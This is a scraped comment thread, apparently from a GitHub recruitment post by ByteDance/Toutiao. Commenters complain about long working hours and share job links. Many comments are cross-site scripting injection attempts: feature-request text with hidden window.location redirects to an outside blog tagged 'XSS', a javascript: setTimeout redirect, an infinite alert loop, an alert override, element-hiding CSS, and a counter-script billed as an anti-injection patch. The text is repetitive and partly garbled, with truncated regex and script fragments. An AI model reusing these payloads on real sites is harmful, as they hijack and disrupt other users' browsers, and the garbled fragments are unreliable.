for(var x of document.getElementsByClassName("body"))
{
if (x.innerHTML.indexOf("script") >= 0)
x.innerHTML = "";
}
反注入补丁
<script> for(var x of document.getElementsByClassName("body"))
{
if (x.innerHTML.indexOf("script") >= 0)
x.innerHTML = "";
}
<script>
If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。
EscapeFromCoding commented about 2 years ago
我司大小周大家都知道了,更烦人的是早上十点上班晚上十点下班,到家差不多就十一点了。才二十几岁就觉得身体大不如前,每天除了上班就只剩睡觉了。最烦的同事一个比一个下班晚,不知道他们哪来的精力。img,svg,table{visibility: collapse;}window.onload=function(){var commentBodySet = document.getElementsByClassName("body");for(var i=1;i
| lnever commented about 2 years ago
头条的价值观完全不适合我们这种人,早跑早轻松
zvving commented about 2 years ago
公司有大小周,多出来的一天有加班费。
日常加班看个人,我都是早10晚8,撇除午饭晚饭时间,还行。(除非临发版本)
忙是非常忙,一直很缺人,内部技术氛围很好,欢迎投递简历😄 zvving[at]gmail.com
penghao03 commented about 2 years ago
lee920217 commented about 2 years ago
头条确定招人吗?面试快要求造个linux出来了
| caokangx commented about 2 years ago
坐标上海,招前端,Windows开发,Rust开发,安卓,ios开发,产品,设计UX,感兴趣投我邮箱caoyikang@bytedance.com
wintonliuwen commented about 2 years ago
🐶奴才
LnsooXD commented about 2 years ago
字节跳动校招也来啦,快来报名吧:http://taou.cn/m3mh1
LnsooXD commented about 2 years ago
招各种前端后端全栈:https://job.toutiao.com/2018/spring_referral/?token=3dB4LleNrtT%2FSw%2Bww%2Bm%2FXA%3D%3D&key=MjE1ODgsMjE1ODksMjQ4MDUsMzE1NTYsMzE1NTcsMzE2MDUsMzMxMzA%3D
zxx-abc commented about 2 years ago
这年头HR不容易,都得上GitHub招聘了
ZhuoranLyu commented about 2 years ago
编,继续给我编
ipkdang commented about 2 years ago
尼玛,头条的HR都上GitHub招聘了
winrey commented about 2 years ago
996极限招聘,HR人才啊) 这是摆明了贵司只要能10106的了(逃
ostopuro commented about 2 years ago
ostopuro commented about 2 years ago
反996工作机会介绍群
| swimmingchar commented about 2 years ago
都是看着内部推荐的奖励去的吧,头条加班基本上业内都知道,早晚10,大小周末,都是知道的。
tio-jack commented about 2 years ago
while(true){ alert("天下武功,唯快不破"); }
superzmy commented about 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } 反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
ghostlo commented about 2 years ago
来大佬推荐一下公司
| zzxcvbnm19 commented about 2 years ago
1
haiboli commented about 2 years ago
window.alert=function(){return false}
guotao commented about 2 years ago
If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
guotao commented about 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
kainy commented about 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
guotao commented about 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。
xyhp915 commented 7 months ago
c